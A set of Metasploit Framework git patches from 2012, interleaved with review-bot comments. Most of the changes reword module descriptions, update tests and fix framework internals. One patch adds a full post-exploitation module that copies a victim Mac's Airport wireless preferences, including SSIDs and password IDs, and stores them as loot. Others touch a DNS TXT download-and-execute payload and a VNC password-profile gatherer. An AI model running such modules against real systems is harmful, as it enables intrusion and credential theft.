Zone Transfers def axfr(target, nssrv) - print_status("Performing Zone Transfer against all nameservers in #{target}") + print_status("Performing zone transfer against all nameservers in #{target}") if not nssrv.nil? @res.nameserver=(nssrv) end @@ -358,7 +358,7 @@ class Metasploit3 < Msf::Auxiliary query = @res.query(target, "NS") if (query.answer.length != 0) (query.answer.select { |i| i.class == Net::DNS::RR::NS}).each do |nsrcd| - print_status("Testing Nameserver: #{nsrcd.nsdname}") + print_status("Testing nameserver: #{nsrcd.nsdname}") nssrvquery = @res.query(nsrcd.nsdname, "A") begin nssrvip = nssrvquery.answer[0].address.to_s 
@@ -368,18 +368,18 @@ class Metasploit3 < Msf::Auxiliary if zone.answer.length != 0 namesrvips = @res.query(nsrcd.nsdname,"A") nsip = namesrvips.answer[0] - print_status("Zone Transfer Successful") + print_status("Zone transfer successful") report_note(:host => nsip.address.to_s, :proto => 'udp', :sname => 'dns', :port => 53 , :type => 'dns.enum', - :data => "Zone Transfer Successful") + :data => "Zone transfer successful") #Prints each record according to its type zone.answer.each do |rr| case rr.type when "A" - print_status("Name: #{rr.name} IP Address: #{rr.address} Record: A ") + print_status("Name: #{rr.name} IP address: #{rr.address} Record: A ") report_note(:host => rr.address.to_s, :proto => 'udp', :sname => 'dns', @@ -453,10 +453,10 @@ class Metasploit3 < Msf::Auxiliary end end else - print_error("Zone Transfer Failed") + print_error("Zone transfer failed") end rescue - print_error("Zone Transfer Failed") + print_error("Zone transfer failed") end end @@ -482,15 +482,15 @@ class Metasploit3 < Msf::Auxiliary end if(datastore['ENUM_BRT']) - if wldcrd & datastore['STOP_WLDCRD'] - print_status("Wildcard Record Found!") + if wldcrd and datastore['STOP_WLDCRD'] + print_error("Wildcard record found!") else dnsbrute(datastore['DOMAIN'],datastore['WORDLIST'],datastore['NS']) end end if(datastore['ENUM_IP6']) - if wldcrd & datastore['STOP_WLDCRD'] + if wldcrd and datastore['STOP_WLDCRD'] print_status("Wildcard Record Found!") else bruteipv6(datastore['DOMAIN'],datastore['WORDLIST'],datastore['NS']) From d95d60670e4cd86590180d2e3e27f20dcf78d043 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 26 Mar 2012 16:20:00 -0500 Subject: [PATCH 23/46] Fix up desc again on enum_dns --- modules/auxiliary/gather/enum_dns.rb | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/modules/auxiliary/gather/enum_dns.rb b/modules/auxiliary/gather/enum_dns.rb index 78e5063977..9cca3b78a8 100644 --- a/modules/auxiliary/gather/enum_dns.rb 
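Review bot: The two wildcard branches in the last hunk of this patch now disagree: the `ENUM_BRT` branch reports `print_error("Wildcard record found!")`, while the `ENUM_IP6` branch keeps the unchanged line `print_status("Wildcard Record Found!")`. I would change the second one to `print_error("Wildcard record found!")` as well, so that both the severity and the capitalization match. For the condition itself, `&&` is the usual boolean operator in Ruby, because `and` binds more loosely than assignment and surprises once the expression is reused outside an `if`: `if wldcrd && datastore['STOP_WLDCRD']`. The enclosing method starts and ends outside the hunk.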
+++ b/modules/auxiliary/gather/enum_dns.rb @@ -19,10 +19,9 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'DNS Record Scanner and Enumerator ', 'Description' => %q{ - This module can be used to enumerate various types of information - about a domain from a specific DNS server by performing various - DNS queries such as zone transfers, reverse lookups, SRV record - bruteforcing, and other techniques. + This module can be used to gather information about a domain from a + given DNS server by performing various DNS queries such as zone + transfers, reverse lookups, SRV record bruteforcing, and other techniques. }, 'Author' => [ 'Carlos Perez ' ], From 8fbf4cf6d9d68be69eb18cf2a2dfc47183c97c5a Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 26 Mar 2012 16:23:54 -0500 Subject: [PATCH 24/46] Grammar on dns_txt_query_exec payload name and desc --- modules/payloads/singles/windows/dns_txt_query_exec.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/payloads/singles/windows/dns_txt_query_exec.rb b/modules/payloads/singles/windows/dns_txt_query_exec.rb index 37b91b12d8..74286ba8bb 100644 --- a/modules/payloads/singles/windows/dns_txt_query_exec.rb +++ b/modules/payloads/singles/windows/dns_txt_query_exec.rb @@ -14,8 +14,8 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, - 'Name' => 'DNS TXT Record Payload Download Execution', - 'Description' => 'Performs a TXT query against a series of DNS record(s) & executes the returning payload', + 'Name' => 'DNS TXT Record Payload Download and Execution', + 'Description' => 'Performs a TXT query against a series of DNS record(s) and executes the returned payload', 'Author' => [ 'corelanc0d3r ' From 7a74cc7694a2c70cb5017e41170794631a16e076 Mon Sep 17 00:00:00 2001 
From: Tod Beardsley Date: Mon, 26 Mar 2012 16:26:40 -0500 Subject: [PATCH 25/46] Quoting "Chicken of the VNC" Otherwise, this looks like a nonsense string to people not familiar with this application. --- modules/post/osx/gather/enum_chicken_vnc_profile.rb | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/modules/post/osx/gather/enum_chicken_vnc_profile.rb b/modules/post/osx/gather/enum_chicken_vnc_profile.rb index 80bbe010ad..697e30318e 100644 --- a/modules/post/osx/gather/enum_chicken_vnc_profile.rb +++ b/modules/post/osx/gather/enum_chicken_vnc_profile.rb @@ -17,11 +17,11 @@ class Metasploit3 < Msf::Post def initialize(info={}) super(update_info(info, - 'Name' => 'OSX Gather Chicken of the VNC Profile ', + 'Name' => 'OSX Gather Chicken of the VNC Profile', 'Description' => %q{ - This module will download Chicken of the VNC client's profile file, - which is used to store other VNC server's information such as the - IP and password. + This module will download the "Chicken of the VNC" client application's + profile file, which is used to store other VNC servers' information such + as as the IP and password. }, 'License' => MSF_LICENSE, 'Author' => [ 'sinn3r'], @@ -107,4 +107,4 @@ class Metasploit3 < Msf::Post end end -end \ No newline at end of file +end From 84197a89033ea4330e177002d245bf88fbc2d53c Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 26 Mar 2012 15:40:43 -0600 Subject: [PATCH 26/46] Return a proper value instead of a silly print --- lib/msf/core/post/windows/registry.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/post/windows/registry.rb b/lib/msf/core/post/windows/registry.rb index d360e1e92d..38ac73cfec 100644 --- a/lib/msf/core/post/windows/registry.rb +++ b/lib/msf/core/post/windows/registry.rb 
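Review bot: The rewritten description in the first hunk reads "such as as the IP and password", with "as" doubled across the line break. The last added description line should be `as the IP and password.`.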
@@ -429,7 +429,7 @@ protected deleted = session.sys.registry.delete_key(root_key, base_key) return deleted rescue Rex::Post::Meterpreter::RequestError => e - print_status "curses, foiled again" + return nil end end From e13535400b4f65285a9ba698d4839e99046d68ab Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 26 Mar 2012 15:41:08 -0600 Subject: [PATCH 27/46] Add exception logging for test failures --- test/lib/module_test.rb | 2 ++ 1 file changed, 2 insertions(+) diff --git a/test/lib/module_test.rb b/test/lib/module_test.rb index ff0e7c9bc2..6dd27c701b 100644 --- a/test/lib/module_test.rb +++ b/test/lib/module_test.rb @@ -33,6 +33,8 @@ module ModuleTest rescue ::Exception => e print_error("FAILED: #{msg}") print_error("Exception: #{e.class} : #{e}") + dlog("Exception in testing - #{msg}") + dlog("Call stack: #{e.backtrace.join("\n")}") return end From d6ba1d3a32f7f2ea7192377e48ab6595438e74dc Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 26 Mar 2012 15:41:26 -0600 Subject: [PATCH 28/46] Convert registry tests to ModuleTest API --- test/modules/post/test/registry.rb | 210 ++++++++++++++++------------- 1 file changed, 116 insertions(+), 94 deletions(-) diff --git a/test/modules/post/test/registry.rb b/test/modules/post/test/registry.rb index 6e5b0e0e00..14cbc45f26 100644 --- a/test/modules/post/test/registry.rb +++ b/test/modules/post/test/registry.rb 
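Review bot: The `rescue` branch in the registry.rb hunk now returns `nil` and discards the `Rex::Post::Meterpreter::RequestError`, so a caller cannot tell a missing key from an access or transport failure, and `e` is bound but never used. I would either drop the binding (`rescue Rex::Post::Meterpreter::RequestError`) or keep it and record the reason before returning, e.g. `dlog("delete_key failed: #{e.class} #{e}")`, assuming `dlog` is available in this mixin as it is in module_test.rb. The method's comment should also state the contract, e.g. `# Returns the result of delete_key on success, nil if the session raises a RequestError.` The method starts outside the hunk.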
@@ -16,118 +16,140 @@ require 'msf/core/post/windows/registry' class Metasploit3 < Msf::Post + include Msf::ModuleTest::PostTest include Msf::Post::Windows::Registry def initialize(info={}) super( update_info( info, 'Name' => 'registry_post_testing', - 'Description' => %q{ This module will test registry code used in post modules}, + 'Description' => %q{ This module will test Post::Windows::Registry API methods }, 'License' => MSF_LICENSE, - 'Author' => [ 'kernelsmith'], + 'Author' => [ + 'kernelsmith', # original + 'egypt', # PostTest conversion + ], 'Version' => '$Revision$', 'Platform' => [ 'windows' ] )) - register_options( - [ - OptString.new("KEY" , [true, "Registry key to test", "HKLM\\Software\\Microsoft\\Active Setup"]), - OptString.new("VALUE" , [true, "Registry value to test", "DisableRepair"]), - ], self.class) + end + + def test_0_registry_read + pending "should evaluate key existence" do + # these methods are not implemented + k_exists = registry_key_exist?(%q#HKCU\Environment#) + k_dne = registry_key_exist?(%q#HKLM\\Non\Existent\Key#) + + (k_exists && !k_dne) + end + + pending "should evaluate value existence" do + # these methods are not implemented + v_exists = registry_value_exist?(%q#HKCU\Environment#, "TEMP") + v_dne = registry_value_exist?(%q#HKLM\\Non\Existent\Key#, "asdf") + + (v_exists && !v_dne) + end + + it "should read values" do + ret = true + valinfo = registry_getvalinfo(%q#HKCU\Environment#, "TEMP") + ret &&= !!(valinfo["Data"]) + ret &&= !!(valinfo["Type"]) + + valdata = registry_getvaldata(%q#HKCU\Environment#, "TEMP") + ret &&= !!(valinfo["Data"] == valdata) + + ret + end + + it "should return normalized values" do + ret = true + valinfo = registry_getvalinfo(%q#HKCU\Environment#, "TEMP") + if (valinfo.nil?) + ret = false + else + # type == 2 means string + ret &&= !!(valinfo["Type"] == 2) + ret &&= !!(valinfo["Data"].kind_of? 
String) + + valinfo = registry_getvalinfo(%q#HKLM\Software\Microsoft\Active Setup#, "DisableRepair") + if (valinfo.nil?) + ret = false + else + # type == 4 means DWORD + ret &&= !!(valinfo["Type"] == 4) + ret &&= !!(valinfo["Data"].kind_of? Numeric) + end + end + + ret + end + + it "should enumerate keys and values" do + ret = true + # Has no keys, should return an empty Array + keys = registry_enumkeys(%q#HKCU\Environment#) + ret &&= (keys.kind_of? Array) + + vals = registry_enumvals(%q#HKCU\Environment#) + ret &&= (vals.kind_of? Array) + ret &&= (vals.count > 0) + ret &&= (vals.include? "TEMP") + + ret + end end - def run - print_status("Running against session #{datastore["SESSION"]}") - print_status("Session type is #{session.type}") + def test_1_registry_write + it "should create keys" do + ret = registry_createkey(%q#HKCU\test_key#) + end - print_status() - print_status("TESTING: registry_value_exist? for key:#{datastore['KEY']}, val:#{datastore['VALUE']}") - results = registry_value_exist?(datastore['KEY'],datastore['VALUE']) - print_status("RESULTS: #{results.class} #{results.inspect}") - - print_status() - print_status("TESTING: registry_value_exist? for key:#{'HKLM\\Non\Existent\key'}, val:#{datastore['VALUE']}") - results = registry_value_exist?('HKLM\\Non\Existent\key',datastore['VALUE']) - print_status("RESULTS (Expecting false): #{results.class} #{results.inspect}") - - print_status() - print_status("TESTING: registry_value_exist? for key:#{datastore['KEY']}, val:'NonExistentValue'") - results = registry_value_exist?(datastore['KEY'],'NonExistentValue') - print_status("RESULTS (Expecting false): #{results.class} #{results.inspect}") - - print_status() - print_status("TESTING: registry_key_exist? 
for key: 'HKLM\\Non\Existent\key'") - results = registry_key_exist?('HKLM\\Non\Existent\key') # need to error handle this properly in meterp ver - print_status("RESULTS (Expecting false): #{results.class} #{results.inspect}") - - print_status() - print_status("TESTING: registry_key_exist? for key:#{datastore['KEY']}") - results = registry_key_exist?(datastore['KEY']) - print_status("RESULTS: #{results.class} #{results.inspect}") - - print_status() - print_status("TESTING: registry_getvalinfo for key:#{datastore['KEY']}, val:#{datastore['VALUE']}") - results = registry_getvalinfo(datastore['KEY'], datastore['VALUE']) - print_error("reported failure") unless results - print_status("RESULTS: #{results.class} #{results.inspect}") - - print_status() - print_status("TESTING: registry_getvaldata for key:#{datastore['KEY']}, val:#{datastore['VALUE']}") - results = registry_getvaldata(datastore['KEY'], datastore['VALUE']) - print_error("reported failure") unless results - print_status("RESULTS: #{results.class} #{results.inspect}") + it "should write REG_SZ values" do + ret = true + registry_setvaldata(%q#HKCU\test_key#, "test_val_str", "str!", "REG_SZ") + registry_setvaldata(%q#HKCU\test_key#, "test_val_dword", 1234, "REG_DWORD") + valinfo = registry_getvalinfo(%q#HKCU\test_key#, "test_val_str") + if (valinfo.nil?) + ret = false + else + # type == REG_SZ means string + ret &&= !!(valinfo["Type"] == 1) + ret &&= !!(valinfo["Data"].kind_of? 
String) + ret &&= !!(valinfo["Data"] == "str!") + end - print_status() - print_status("TESTING: registry_createkey for key:#{datastore['KEY']}\\test") - results = registry_createkey("#{datastore['KEY']}\\test") - print_error("reported failure") if results - print_status("RESULTS: #{results.class} #{results.inspect}") + ret + end - print_status() - print_status("TESTING: registry_setvaldata for key:#{datastore['KEY']}\\test, val:test, data:test, type:REG_SZ") - results = registry_setvaldata("#{datastore['KEY']}\\test", "test", "test", "REG_SZ") - print_error("reported failure") if results - print_status("RESULTS: #{results.class} #{results.inspect}") - print_status() - print_status("Running registry_getvalinfo for freshly created key:#{datastore['KEY']}\\test, val:test") - results = registry_getvalinfo("#{datastore['KEY']}\\test", "test") - print_error("reported failure") unless results - print_status("RESULTS: #{results.class} #{results.inspect}") + it "should write REG_DWORD values" do + ret = true + registry_setvaldata(%q#HKCU\test_key#, "test_val_dword", 1234, "REG_DWORD") + valinfo = registry_getvalinfo(%q#HKCU\test_key#, "test_val_dword") + if (valinfo.nil?) + ret = false + else + ret &&= !!(valinfo["Type"] == 4) + ret &&= !!(valinfo["Data"].kind_of? Numeric) + ret &&= !!(valinfo["Data"] == 1234) + end + ret + end - print_status() - print_status("TESTING: registry_deleteval for key:#{datastore['KEY']}\\test, val:test") - results = registry_deleteval("#{datastore['KEY']}\\test", "test") - print_error("reported failure") if results - print_status("RESULTS: #{results.class} #{results.inspect}") + it "should delete keys" do + ret = registry_deleteval(%q#HKCU\test_key#, "test_val_str") + valinfo = registry_getvalinfo(%q#HKCU\test_key#, "test_val_str") + # getvalinfo should return nil for a non-existent key + ret &&= (valinfo.nil?) 
+ ret &&= registry_deletekey(%q#HKCU\test_key#) + # Deleting the key should delete all its values + valinfo = registry_getvalinfo(%q#HKCU\test_key#, "test_val_dword") + ret &&= (valinfo.nil?) - print_status() - print_status("TESTING: registry_deletekey") - results = registry_deletekey("#{datastore['KEY']}\\test") - print_error("reported failure") if results - print_status("RESULTS: #{results.class} #{results.inspect}") - - print_status() - print_status("Running registry_getvalinfo for deleted key:#{datastore['KEY']}\\test, val:test") - print_status("NOTE: this OUGHT to return nil") - results = registry_getvalinfo("#{datastore['KEY']}\\test", "test") - print_status("RESULTS (Expecting nil): #{results.class} #{results.inspect}") - print_error("reported failure") if results - print_status("nil is correct. sweet.") if !results - - print_status() - print_status("TESTING: registry_enumkeys") - results = registry_enumkeys(datastore['KEY']) - print_error("reported failure") unless results - print_status("RESULTS: #{results.class} #{results.inspect}") - - print_status() - print_status("TESTING: registry_enumvals") - results = registry_enumvals(datastore['KEY']) - print_error("reported failure") unless results - print_status("RESULTS: #{results.class} #{results.inspect}") - - print_status() - print_status("Testing Complete!") + ret + end end From 98882621c059ca8f4fabfeb6a21b8bd8cd5c7210 Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 26 Mar 2012 17:06:43 -0600 Subject: [PATCH 29/46] Allow empty values for OptRegexp options --- lib/msf/core/option_container.rb | 2 ++ 1 file changed, 2 insertions(+) diff --git a/lib/msf/core/option_container.rb b/lib/msf/core/option_container.rb index 49ffcdb101..c2242dcf93 100644 --- a/lib/msf/core/option_container.rb +++ b/lib/msf/core/option_container.rb @@ -462,6 +462,7 @@ class OptRegexp < OptBase unless super return false end + return true if (not required? and value.nil?) begin Regexp.compile(value) 
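Review bot: The write tests in test/modules/post/test/registry.rb treat a truthy return as success (`ret = registry_createkey(...)`, `ret = registry_deleteval(...)`, `ret &&= registry_deletekey(...)`), whereas the removed `run` printed "reported failure" when those same calls returned a truthy value. One of the two readings is wrong, so it is worth confirming what each method in `Msf::Post::Windows::Registry` returns on success and asserting on that value explicitly rather than on truthiness. Separately, `HKCU\test_key` is removed only by the last `it` block of `test_1_registry_write`; if an earlier block raises or returns early, the key and its values stay behind on the tested host, so the deletion belongs in a cleanup step that always runs. The "should write REG_SZ values" block also writes `test_val_dword`, which the REG_DWORD block then writes again.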
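Review bot: The guard added to `OptRegexp#valid?` (and the matching one in `normalize`, next hunk) tests only `value.nil?`, while the commit subject promises empty values. An empty string still reaches `Regexp.compile(value)`, which succeeds and yields a pattern that matches everything, so a filter the operator left blank would silently become "match all" instead of "no filter". If an unset option can arrive as `''` (not visible from this hunk), both methods should treat it like nil, e.g. `return nil if value.nil? or value.to_s.empty?` in `normalize`. Both methods start and end outside their hunks.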
@@ -473,6 +474,7 @@ class OptRegexp < OptBase end def normalize(value) + return nil if value.nil? return Regexp.compile(value) end From 988817389660023c5d1fc858d4ddf9488ba9d71f Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 26 Mar 2012 17:08:33 -0600 Subject: [PATCH 30/46] Convert railgun tests to ModuleTest API --- .../post/test/railgun_reverse_lookups.rb | 82 ++++++++++++++----- 1 file changed, 61 insertions(+), 21 deletions(-) diff --git a/test/modules/post/test/railgun_reverse_lookups.rb b/test/modules/post/test/railgun_reverse_lookups.rb index 5571f42373..d921cbcf76 100644 --- a/test/modules/post/test/railgun_reverse_lookups.rb +++ b/test/modules/post/test/railgun_reverse_lookups.rb @@ -12,9 +12,11 @@ require 'msf/core' require 'rex' require 'msf/core/post/windows/railgun' +load 'lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb' class Metasploit3 < Msf::Post + include Msf::ModuleTest::PostTest include Msf::Post::Windows::Railgun def initialize(info={}) 
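Review bot: The added `load 'lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb'` in railgun_reverse_lookups.rb is only found when the process working directory is the framework root (or a load-path entry happens to contain a `lib/` directory), and `load` re-evaluates the file every time this module is loaded. The neighbouring lines already rely on `lib/` being on the load path (`require 'rex'`), so `require 'rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager'` is the more robust form. If re-evaluating the file is intentional for the test, a one-line comment saying why would help the next reader.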
@@ -26,33 +28,71 @@ class Metasploit3 < Msf::Post 'Version' => '$Revision$', 'Platform' => [ 'windows' ] )) + register_options( - [ - OptInt.new("ERR_CODE" , [true, "Error code to reverse lookup", 0x420]), - OptInt.new("WIN_CONST", [true, "Windows constant to reverse lookup", 4]), - OptRegexp.new("WCREGEX", [false,"Regexp to apply to constant rev lookup", '^SERVICE']), - OptRegexp.new("ECREGEX", [false,"Regexp to apply to error code lookup", '^ERROR_SERVICE_']), + [ + OptInt.new("ERR_CODE", [ false, "Error code to reverse lookup" ]), + OptInt.new("WIN_CONST", [ false, "Windows constant to reverse lookup" ]), + OptRegexp.new("WCREGEX", [ false, "Regexp to apply to constant rev lookup" ]), + OptRegexp.new("ECREGEX", [ false, "Regexp to apply to error code lookup" ]), ], self.class) end - def run - print_debug datastore['ECREGEX'] - print_status("Running against session #{datastore["SESSION"]}") - print_status("Session type is #{session.type}") + def test_static + + it "should return a constant name given a const and a filter" do + ret = true + results = select_const_names(4, /^SERVICE/) + + ret &&= !!(results.kind_of? Array) + # All of the returned values should match the filter and have the same value + results.each { |const| + ret &&= !!(const =~ /^SERVICE/) + ret &&= !!(session.railgun.constant_manager.parse(const) == 4) + } + + # Should include things that match the filter and the value + ret &&= !!(results.include? "SERVICE_RUNNING") + # Should NOT include things that match the value but not the filter + ret &&= !!(not results.include? "CLONE_FLAG_ENTITY") + + ret + end + + it "should return an error string given an error code" do + ret = true + results = lookup_error(0x420, /^ERROR_SERVICE/) + ret &&= !!(results.kind_of? 
Array) + ret &&= !!(results.length == 1) + + ret + end + + end + + def test_datastore + + if (datastore["WIN_CONST"]) + it "should look up arbitrary constants" do + ret = true + results = select_const_names(datastore['WIN_CONST'], datastore['WCREGEX']) + vprint_status("RESULTS: #{results.class} #{results.pretty_inspect}") + + ret + end + end + + if (datastore["ERR_CODE"]) + it "should look up arbitrary error codes" do + ret = true + results = lookup_error(datastore['ERR_CODE'], datastore['ECREGEX']) + vprint_status("RESULTS: #{results.class} #{results.inspect}") + + ret + end + end - print_status() - print_status("TESTING: select_const_names on #{datastore['WIN_CONST']} filtering by #{datastore['WCREGEX'].to_s}") - results = select_const_names(datastore['WIN_CONST'],datastore['WCREGEX']) - print_status("RESULTS: #{results.class} #{results.pretty_inspect}") - - print_status() - print_status("TESTING: error_lookup on #{datastore['ERR_CODE']} filtering by #{datastore['ECREGEX'].to_s}") - results = lookup_error(datastore['ERR_CODE'],datastore['ECREGEX']) - print_status("RESULTS: #{results.class} #{results.inspect}") - - print_status() - print_status("Testing Complete!") end end From ad92eff66c862229e39947a92f9ae834c8a29e52 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Mon, 26 Mar 2012 22:43:33 -0500 Subject: [PATCH 31/46] Correct an issue where launched exploits only used saved configurations --- lib/msf/base/simple/auxiliary.rb | 2 +- lib/msf/base/simple/exploit.rb | 2 +- lib/msf/base/simple/framework.rb | 4 ++-- lib/msf/base/simple/module.rb | 4 ++-- lib/msf/base/simple/post.rb | 2 +- 5 files changed, 7 insertions(+), 7 deletions(-) diff --git a/lib/msf/base/simple/auxiliary.rb b/lib/msf/base/simple/auxiliary.rb index b5cd6fab2c..195072800a 100644 --- a/lib/msf/base/simple/auxiliary.rb +++ b/lib/msf/base/simple/auxiliary.rb 
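Review bot: The two `it` blocks in `test_datastore` can only fail by raising: each sets `ret = true`, prints `results` with `vprint_status` and returns `ret` unchanged. At minimum they should check the shape of the result the way `test_static` does, e.g. `ret &&= !!(results.kind_of? Array)`, so that a `nil` or non-array return is reported as a failure. In `test_static`, the `lookup_error` block checks only `results.length == 1`; comparing the single element against the expected constant name would pin the behaviour rather than just the count.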
@@ -44,7 +44,7 @@ module Auxiliary # Clone the module to prevent changes to the original instance mod = omod.replicant - Msf::Simple::Framework.simplify_module(mod) + Msf::Simple::Framework.simplify_module( mod, false ) # Import options from the OptionStr or Option hash. mod._import_extra_options(opts) diff --git a/lib/msf/base/simple/exploit.rb b/lib/msf/base/simple/exploit.rb index 11802d0a35..9665438349 100644 --- a/lib/msf/base/simple/exploit.rb +++ b/lib/msf/base/simple/exploit.rb @@ -60,7 +60,7 @@ module Exploit # Clone the module to prevent changes to the original instance exploit = oexploit.replicant - Msf::Simple::Framework.simplify_module( exploit ) + Msf::Simple::Framework.simplify_module( exploit, false ) # Import options from the OptionStr or Option hash. diff --git a/lib/msf/base/simple/framework.rb b/lib/msf/base/simple/framework.rb index 27d8392938..b9d3fde778 100644 --- a/lib/msf/base/simple/framework.rb +++ b/lib/msf/base/simple/framework.rb @@ -136,12 +136,12 @@ module Framework # Simplifies a module instance if the type is supported by extending it # with the simplified module interface. # - def self.simplify_module(instance) + def self.simplify_module(instance, load_saved_config = true) if ((ModuleSimplifiers[instance.type]) and (instance.class.include?(ModuleSimplifiers[instance.type]) == false)) instance.extend(ModuleSimplifiers[instance.type]) - instance.init_simplified + instance.init_simplified(load_saved_config) end end diff --git a/lib/msf/base/simple/module.rb b/lib/msf/base/simple/module.rb index 48a9ddfac4..396d9d99c5 100644 --- a/lib/msf/base/simple/module.rb +++ b/lib/msf/base/simple/module.rb @@ -32,8 +32,8 @@ module Module # # Initializes the simplified interface. # - def init_simplified - load_config + def init_simplified(load_saved_config=true) + load_config if load_saved_config end # diff --git a/lib/msf/base/simple/post.rb b/lib/msf/base/simple/post.rb index d9c5c01647..c5174e5204 100644 --- a/lib/msf/base/simple/post.rb 
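Review bot: The comments above `simplify_module` in framework.rb and `init_simplified` in module.rb still describe the one-argument form and never mention `load_saved_config`. I would add a line to each such as `# load_saved_config: when false, load_config is not called for this instance`. The bare `false` at the call sites in auxiliary.rb, exploit.rb and post.rb is hard to read on its own, so a trailing `# do not load the saved config` would help there. The two signatures also differ in spacing (`load_saved_config = true` against `load_saved_config=true`).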
+++ b/lib/msf/base/simple/post.rb @@ -40,7 +40,7 @@ module Post # Clone the module to prevent changes to the original instance mod = omod.replicant - Msf::Simple::Framework.simplify_module( mod ) + Msf::Simple::Framework.simplify_module( mod, false ) # Import options from the OptionStr or Option hash. mod._import_extra_options(opts) From 670e15b40fc83cfa5e8515a78b310d102a955d41 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 27 Mar 2012 01:18:38 -0500 Subject: [PATCH 32/46] Add OSX Gather Airport post module --- modules/post/osx/gather/enum_airport.rb | 74 +++++++++++++++++++++++++ 1 file changed, 74 insertions(+) create mode 100644 modules/post/osx/gather/enum_airport.rb diff --git a/modules/post/osx/gather/enum_airport.rb b/modules/post/osx/gather/enum_airport.rb new file mode 100644 index 0000000000..9fa58848ae --- /dev/null +++ b/modules/post/osx/gather/enum_airport.rb 
@@ -0,0 +1,74 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' +require 'msf/core/post/common' +require 'rexml/document' + +class Metasploit3 < Msf::Post + + include Msf::Post::Common + + def initialize(info={}) + super(update_info(info, + 'Name' => 'OSX Gather Airport Wireless Preferences', + 'Description' => %q{ + This module will download OSX Airport Wireless preferences from the victim + machine. The preferences file (which is a plist) contains information such as: + SSID, Channels, Security Type, Password ID, etc. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'sinn3r'], + 'Platform' => [ 'osx' ], + 'SessionTypes' => [ "shell" ] + )) + end + + def exec(cmd) + begin + out = cmd_exec(cmd).chomp + rescue ::Timeout::Error => e + vprint_error("#{@peer} - #{e.message} - retrying...") + retry + rescue EOFError => e + vprint_error("#{@peer} - #{e.message} - retrying...") + retry + end + end + + + def get_air_preferences + pref = exec("cat /Library/Preferences/SystemConfiguration/com.apple.airport.preferences.plist") + return pref =~ /No such file or directory/ ? nil : pref + end + + def save(data) + p = store_loot( + "apple.airport.preferences", + "plain/text", + session, + data, + "com.apple.airport.preferences.plist") + + print_good("#{@peer} - plist saved in #{p}") + end + + def run + @peer = "#{session.session_host}:#{session.session_port}" + + # Download the plist. If not found (nil), then bail + pref = get_air_preferences + if pref.nil? + print_error("#{@peer} - Unable to find airport preferences") + return + end + + # Save the raw version of the plist + save(pref) + end + +end From e44f9d06ecc33aa39c6bad5004e3309297c2e340 Mon Sep 17 00:00:00 2001 
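Review bot: The `exec` helper retries without any bound, so a session that keeps raising `::Timeout::Error` or `EOFError` makes the module loop forever, printing "retrying..." each time. I would count attempts and re-raise after a small limit; the limit of 3 in the sketch below is my own choice. The name also shadows `Kernel#exec` inside the module, so something like `exec_retry` would be clearer. The loot content type `"plain/text"` in `save` looks like it was meant to be `"text/plain"`.

```ruby
def exec(cmd)
  attempts = 0
  begin
    cmd_exec(cmd).chomp
  rescue ::Timeout::Error, EOFError => e
    attempts += 1
    # give up instead of looping forever on a dead or stalled session
    raise if attempts >= 3
    vprint_error("#{@peer} - #{e.message} - retrying...")
    retry
  end
end
```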
From: sinn3r Date: Tue, 27 Mar 2012 01:24:12 -0500 Subject: [PATCH 33/46] Remove the extra 'require' --- modules/post/osx/gather/enum_airport.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/post/osx/gather/enum_airport.rb b/modules/post/osx/gather/enum_airport.rb index 9fa58848ae..7171c4dc19 100644 --- a/modules/post/osx/gather/enum_airport.rb +++ b/modules/post/osx/gather/enum_airport.rb @@ -7,7 +7,6 @@ require 'msf/core' require 'msf/core/post/common' -require 'rexml/document' class Metasploit3 < Msf::Post From a0f0aadad332f7c36caa3f0f8c3562b7e64432dc Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Tue, 27 Mar 2012 08:32:47 -0500 Subject: [PATCH 34/46] Fixing checksum uri generator again. This time, it's ensured that generate_uri_checksum(sum) will succeed, provided the sum is an even number between 80 and 100 (tested) It's still not great for arbitrary checksum targets, but that's because there are lots of strings that cannot satisfy the requirement. I kind of think this is the fault of Rex. --- lib/msf/core/handler/reverse_http.rb | 11 +++++++---- lib/msf/core/handler/reverse_https.rb | 9 ++++++--- 2 files changed, 13 insertions(+), 7 deletions(-) diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb index 148e78dd46..d23519cf78 100644 --- a/lib/msf/core/handler/reverse_http.rb +++ b/lib/msf/core/handler/reverse_http.rb @@ -60,14 +60,17 @@ module ReverseHttp uri_match end - + # # Create a URI that matches a given checksum # def generate_uri_checksum(sum) - uri = Rex::Text.rand_text_alphanumeric(3) - ("a".."z").sort_by {rand}.each do |x| - return(uri + x) if Rex::Text.checksum8(uri + x) + chk = ("a".."z").to_a + ("A".."Z").to_a + ("0".."9").to_a + 32.times do + uri = Rex::Text.rand_text_alphanumeric(3) + chk.sort_by {rand}.each do |x| + return(uri + x) if Rex::Text.checksum8(uri + x) == sum + end end raise RuntimeError, "Unable to generate a string with checksum #{sum}" end 
